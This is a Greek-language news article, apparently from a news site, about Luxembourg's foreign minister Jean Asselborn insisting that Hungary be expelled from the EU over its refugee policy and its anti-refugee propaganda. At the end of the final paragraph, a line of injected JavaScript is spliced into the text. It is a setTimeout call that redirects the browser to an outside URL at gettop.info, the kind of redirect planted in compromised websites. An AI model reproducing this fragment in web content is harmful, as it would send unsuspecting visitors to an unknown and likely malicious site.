Επιμένει ο Άσελμπορν για αποβολή της Ουγγαρίας από την ΕΕ

0
11

 

Επέμεινε στις χθεσινές του θέσεις ότι η Ουγγαρία πρέπει να αποβληθεί από την ΕΕ λόγω της στάσης της στο προσφυγικό και τη συμπεριφορά των Αρχών με τον φράκτη και τις απελάσεις προσφύγων-μεταναστών ο υπουργός Εξωτερικών του Λουξεμβούργου Ζαν Άσελμπορν.

«Ίσως εκφράστηκα άκομψα, αλλά συνεχίζω να υποστηρίζω την γνώμη μου», είπε στο δημόσιο γερμανικό ραδιόφωνο (DLF).

Ο Άσελμπορν είπε πως είναι «εξαιρετικά άσχημα» όσα πράττει η Ουγγαρία και σημείωσε ότι δεν τον ενδιαφέρει να τιμωρηθεί η χώρα, αλλά «όταν μια κυβέρνηση πολιτεύεται πέραν των ευρωπαϊκών αξιών, τότε η συμμετοχή της δεν έχει νόημα«.

«Στην Ουγγαρία έχουν αναρτηθεί πλακάτ με τα οποία εξομοιώνονται οι πρόσφυγες με τους τρομοκράτες«, πρόσθεσε ο Άσελμπορν, ο οποίος μίλησε για «προπαγανδιστική υστερία η οποία έχει ξεσπάσει στη χώρα» αυτή.

Επίσης ο ΥΠΕΞ του Λουξεμβούργου υπενθύμισε δε ότι ο Ούγγρος πρωθυπουργός έχει χαρακτηρίσει τη γραφειοκρατία των Βρυξελλών «δημοκρατία του Ράιχ των Βρυξελλών», η οποία θέλει να καταστρέψει τη χριστιανική Δύση.

Ο Άσελμπορν επεσήμανε ότι οι απόψεις του δεν θα εκληφθούν ως επίθεση στην Ουγγαρία και τον λαό της αλλά κραυγή διαμαρτυρίας που «απευθύνεται στην κυβέρνηση, μήπως έτσι πάρει ίσως μια βαθιά ανάσα και σκεφτεί τι είναι η Ευρωπαϊκή Ένωση και που θα μπορούσαν να καταλήξουν τέτοιες θέσεις«.

Κατά την άποψή του υπουργού Εξωτερικών του Λουξεμβούργου, η Ουγγαρία στρέφεται κατά της κουλτούρας των αξιών επί της οποίας οικοδομήθηκε η Ευρώπη το 1945. «Είτε θα το καταπιεί κανείς, είτε θα βάλει τις φωνές» είπε χαρακτηριστικά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here